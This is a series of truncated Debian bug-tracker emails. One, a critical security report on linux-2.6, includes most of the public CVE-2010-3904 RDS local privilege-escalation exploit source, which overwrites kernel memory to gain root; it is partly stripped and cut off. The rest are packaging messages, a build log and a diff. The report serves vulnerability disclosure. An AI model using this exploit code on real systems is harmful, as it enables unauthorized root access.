Bug#600757: Possible Fix
tag 600757 pending thanks It is patch can fix: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f -- Juan Angulo Moreno -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#600757: linux-2.6: Linux RDS Protocol Local Privilege Escalation
Package: linux-2.6 Version: 2.6.32-5-686 Severity: critical Tags: security Justification: root security hole There is a security hole in all versions of linux-2.6 distributed by Debian. The attached exploit code can be used to test if a kernel is vulnerable, it starts a root shell. I test it in Debian Squeeze, a screenshot can be found in http://i56.tinypic.com/2nh19v6.png -- Juan Angulo Moreno /* * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit * CVE-2010-3904 * by Dan Rosenberg * * Copyright 2010 Virtual Security Research, LLC * * The handling functions for sending and receiving RDS messages * use unchecked __copy_*_user_inatomic functions without any * access checks on user-provided pointers. As a result, by * passing a kernel address as an iovec base address in recvmsg-style * calls, a local user can overwrite arbitrary kernel memory, which * can easily be used to escalate privileges to root. Alternatively, * an arbitrary kernel read can be performed via sendmsg calls. * * This exploit is simple - it resolves a few kernel symbols, * sets the security_ops to the default structure, then overwrites * a function pointer (ptrace_traceme) in that structure to point * to the payload. After triggering the payload, the original * value is restored. Hard-coding the offset of this function * pointer is a bit inelegant, but I wanted to keep it simple and * architecture-independent (i.e. no inline assembly). * * The vulnerability is yet another example of why you shouldn't * allow loading of random packet families unless you actually * need them. * * Greets to spender, kees, taviso, hawkes, team lollerskaters, * joberheide, bla, sts, and VSR * */ #include #include #include #include #include #include #include #include #include #include #include #define RECVPORT #define SENDPORT int prep_sock(int port) { int s, ret; struct sockaddr_in addr; s = socket(PF_RDS, SOCK_SEQPACKET, 0); if(s < 0) { printf("[*] Could not open socket.\n"); exit(-1); } memset(&addr, 0, sizeof(addr)); addr.sin_addr.s_addr = inet_addr("127.0.0.1"); addr.sin_family = AF_INET; addr.sin_port = htons(port); ret = bind(s, (struct sockaddr *)&addr, sizeof(addr)); if(ret < 0) { printf("[*] Could not bind socket.\n"); exit(-1); } return s; } void get_message(unsigned long address, int sock) { recvfrom(sock, (void *)address, sizeof(void *), 0, NULL, NULL); } void send_message(unsigned long value, int sock) { int size, ret; struct sockaddr_in recvaddr; struct msghdr msg; struct iovec iov; unsigned long buf; memset(&recvaddr, 0, sizeof(recvaddr)); size = sizeof(recvaddr); recvaddr.sin_port = htons(RECVPORT); recvaddr.sin_family = AF_INET; recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); memset(&msg, 0, sizeof(msg)); msg.msg_name = &recvaddr; msg.msg_namelen = sizeof(recvaddr); msg.msg_iovlen = 1; buf = value; iov.iov_len = sizeof(buf); iov.iov_base = &buf; msg.msg_iov = &iov; ret = sendmsg(sock, &msg, 0); if(ret < 0) { printf("[*] Something went wrong sending.\n"); exit(-1); } } void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock) { if(!fork()) { sleep(1); send_message(value, sendsock); exit(1); } else { get_message(addr, recvsock); wait(NULL); } } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) getroot(void * file, void * vma) { commit_creds(prepare_kernel_cred(0)); return -1; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr
Bug#517568: Waiting for sponsorship
Hi, I have uploaded the package to mentors.debian.net (http://mentors.debian.net/debian/pool/main/m/motion/motion_3.2.11-2.dsc) and currently waiting for sponsorship. -- Juan Angulo Moreno -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#482231: motion: FTBFS: checking size of short int... configure: error: cannot compute sizeof (short int)
Hi Lucas, Y build motion 3.2.9-2 in amd64 node with Sid and they built successfully. You can see the log here: http://0x29.com.ve/debian/motion/logs/00_checking_size_of_short_int.txt I use Gcc 4.3: [EMAIL PROTECTED]:~/pkgs/motion/tmp/motion-3.2.9$ x86_64-linux-gnu-gcc -v Usando especificaciones internas. Objetivo: x86_64-linux-gnu Configurado con: ../src/configure -v --with-pkgversion='Debian 4.3.0-5' --with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs --enable-languages=c,c++,fortran,objc,obj-c++ --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-cld --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu Modelo de hilos: posix gcc versión 4.3.1 20080523 (prerelease) (Debian 4.3.0-5) Lucas Nussbaum escribió: > Package: motion > Version: 3.2.9-2 > Severity: serious > User: [EMAIL PROTECTED] > Usertags: qa-ftbfs-20080520 qa-ftbfs > Justification: FTBFS on i386 > > Hi, > > During a rebuild of all packages in sid, your package failed to build on > i386. > > This rebuild was done with gcc 4.3 instead of gcc 4.2, because gcc 4.3 > is now the default on most architectures (even if it's not the case on > i386 yet). Consequently, many failures are caused by the switch to gcc > 4.3. > If you determine that this failure is caused by gcc 4.3, feel free to > downgrade this bug to 'important' if your package is only built on i386, > and this bug is specific to gcc 4.3 (i.e the package builds fine with > gcc 4.2). > > Relevant part: >> /usr/bin/fakeroot debian/rules clean >> dh_testdir >> dh_testroot >> rm -f build-stamp configure-stamp >> [ ! -f Makefile ] || /usr/bin/make distclean >> rm -f config.{sub,guess,log,status} >> dh_clean >> dpkg-source -b motion-3.2.9 >> dpkg-source: info: using source format `1.0' >> dpkg-source: info: building motion using existing motion_3.2.9.orig.tar.gz >> dpkg-source: info: building motion in motion_3.2.9-2.diff.gz >> dpkg-source: info: building motion in motion_3.2.9-2.dsc >> debian/rules build >> dh_testdir >> cp -f /usr/share/misc/config.guess config.guess >> cp -f /usr/share/misc/config.sub config.sub >> # Add here commands to configure the package. >> CFLAGS="-Wall -g -O2" LDFLAGS="-Wl,--as-needed" ./configure \ >> --prefix=/usr \ >> --bindir=\${prefix}/bin \ >> --build=i486-linux-gnu \ >> --host=i486-linux-gnu \ >> --datadir=\${prefix}/share \ >> --mandir=\${datadir}/man \ >> --infodir=\${datadir}/info \ >> --sysconfdir=/etc/motion \ >> --with-ffmpeg \ >> --with-mysql \ >> --with-pgsql \ >> --without-optimizecpu \ >> --without-jpeg-mmx >> checking for Darwin... no >> checking for *BSD... no >> checking for i486-linux-gnu-gcc... i486-linux-gnu-gcc >> checking for C compiler default output file name... a.out >> checking whether the C compiler works... yes >> checking whether we are cross compiling... no >> checking for suffix of executables... >> checking for suffix of object files... o >> checking whether we are using the GNU C compiler... yes >> checking whether i486-linux-gnu-gcc accepts -g... yes >> checking for i486-linux-gnu-gcc option to accept ISO C89... none needed >> checking for pthread_create in -lpthread... yes >> checking for libjpeg-mmx... skipping >> checking for jpeg_set_defaults in -ljpeg... yes >> checking how to run the C preprocessor... i486-linux-gnu-gcc -E >> checking for grep that handles long lines and -e... /bin/grep >> checking for egrep... /bin/grep -E >> checking for ANSI C header files... yes >> checking for sys/types.h... yes >> checking for sys/stat.h... yes >> checking for stdlib.h... yes >> checking for string.h... yes >> checking for memory.h... yes >> checking for strings.h... yes >> checking for inttypes.h... yes >> checking for stdint.h... yes >> checking for unistd.h... yes >> checking mjpegtools/jpegutils.h usability... no >> checking mjpegtools/jpegutils.h presence... no >> checking for mjpegtools/jpegutils.h... no >> checking mjpegtools/mjpeg_types.h usability... no >> checking mjpegtools/mjpeg_types.h presence... no >> checking for mjpegtools/mjpeg_types.h... no >> checking mjpegtools... no >> checking for ffmpeg autodetecting... found for debian >> checking for ffmpeg headers... found for debian >> checking file_protocol is defined in ffmpeg ?... no >> checking for mysql support... testing >> checking autodect mysql headers... yes >> checking autodect mysql libs... found >> checking for PostgreSQL... yes >> checking for PQcmdTuples in -lpq... no >> checking for PQoidValue in -lpq... no >> checking for PQclientEncoding in -lpq..
Bug#462864: Patch
Package: papercut Version: 0.9.13-4.1 Severity: serious Tags: patch Hi, In the attachment you will find the patch to repair this bug. -- Juan Angulo Moreno --- System information. --- Architecture: i386 Kernel: Linux 2.6.22-3-686 Debian Release: lenny/sid --- Package information. --- Depends (Version) | Installed =-+-=== adduser | 3.105 python| 2.4.4-6 python-support (>= 0.7.1) | 0.7.6 diff -urNp papercut-0.9.13/debian/changelog papercut-0.9.13_new/debian/changelog --- papercut-0.9.13/debian/changelog 2008-02-21 23:29:57.0 -0430 +++ papercut-0.9.13_new/debian/changelog 2008-02-21 23:43:53.0 -0430 @@ -1,3 +1,15 @@ +papercut (0.9.13-4.1) unstable; urgency=low + + * Non-maintainer upload. + * Added debian/papercut.postinst with user/group creation. (Closes: #462864) + * Fixed debian/papercut.postrm with delete user support. + * Fixed debian/papercut.init (with user daemon support). + * Added debian/pyDaemon.py library. + * Fixed papercut script with pyDaemon.py. + * Fixed .pid file (Its uses the default directory /var/run/papercut). + + -- Juan Angulo Moreno <[EMAIL PROTECTED]> Wed, 20 Feb 2008 03:29:33 -0430 + papercut (0.9.13-4) unstable; urgency=low * Switch to the new Python Policy. (Closes: #380886) diff -urNp papercut-0.9.13/debian/control papercut-0.9.13_new/debian/control --- papercut-0.9.13/debian/control 2008-02-21 23:29:57.0 -0430 +++ papercut-0.9.13_new/debian/control 2008-02-21 18:50:45.0 -0430 @@ -2,14 +2,15 @@ Source: papercut Section: news Priority: optional Maintainer: Jérémy Bobbio <[EMAIL PROTECTED]> -Build-Depends: debhelper (>= 5.0.37.2), python-support (>= 0.3) +Build-Depends: debhelper (>= 5.0.37.2), python-support (>= 0.3), dpatch Build-Depends-Indep: python, xsltproc, docbook-xsl -Standards-Version: 3.7.2 +Standards-Version: 3.7.3 +HomePage: http://pessoal.org/papercut/ XS-Python-Version: current Package: papercut Architecture: all -Depends: ${python:Depends} +Depends: ${python:Depends}, adduser XB-Python-Version: ${python:Versions} Recommends: python-mysqldb, python-pgsql Suggests: phpbb2, mysql-server @@ -32,5 +33,3 @@ Description: simple and extensible NNTP Please note that Papercut is only a NNTP server, not a full-featured news transport system. It does not handle newsfeeding or other usual news software features. - . - Homepage: http://pessoal.org/papercut/ diff -urNp papercut-0.9.13/debian/copyright papercut-0.9.13_new/debian/copyright --- papercut-0.9.13/debian/copyright 2008-02-21 23:29:57.0 -0430 +++ papercut-0.9.13_new/debian/copyright 2008-02-21 19:20:47.0 -0430 @@ -10,25 +10,47 @@ Changes: The docs/ directory and its content was removed: IETF RFCs are non-free in the DFSG sense. +Files: * Copyright: - (c) 2002-2005 Joao Prado Maia <[EMAIL PROTECTED]> - - Permission is hereby granted, free of charge, to any person obtaining a - copy of this software and associated documentation files (the "Software"), - to deal in the Software without restriction, including without limitation - the rights to use, copy, modify, merge, publish, distribute, sublicense, - and/or sell copies of the Software, and to permit persons to whom the - Software is furnished to do so, subject to the following conditions: - - The above copyright notice and this permission notice shall be included in - all copies or substantial portions of the Software. - - THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - SOFTWARE. +(c) 2002-2005 Joao Prado Maia <[EMAIL PROTECTED]> + Permission is hereby granted, free of charge, to any person obtaining a + copy of this software and associated documentation files (the "Software"), + to deal in the Software without restriction, including without limitation + the rights to use, copy, modify, merge, publish, distribute, sublicense, + and/or sell copies of the Software, and to permit persons to whom the + Software is furnished to do so, subject to the following conditions: + + The above copyright notice and this permission notice shall be included in + all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVEN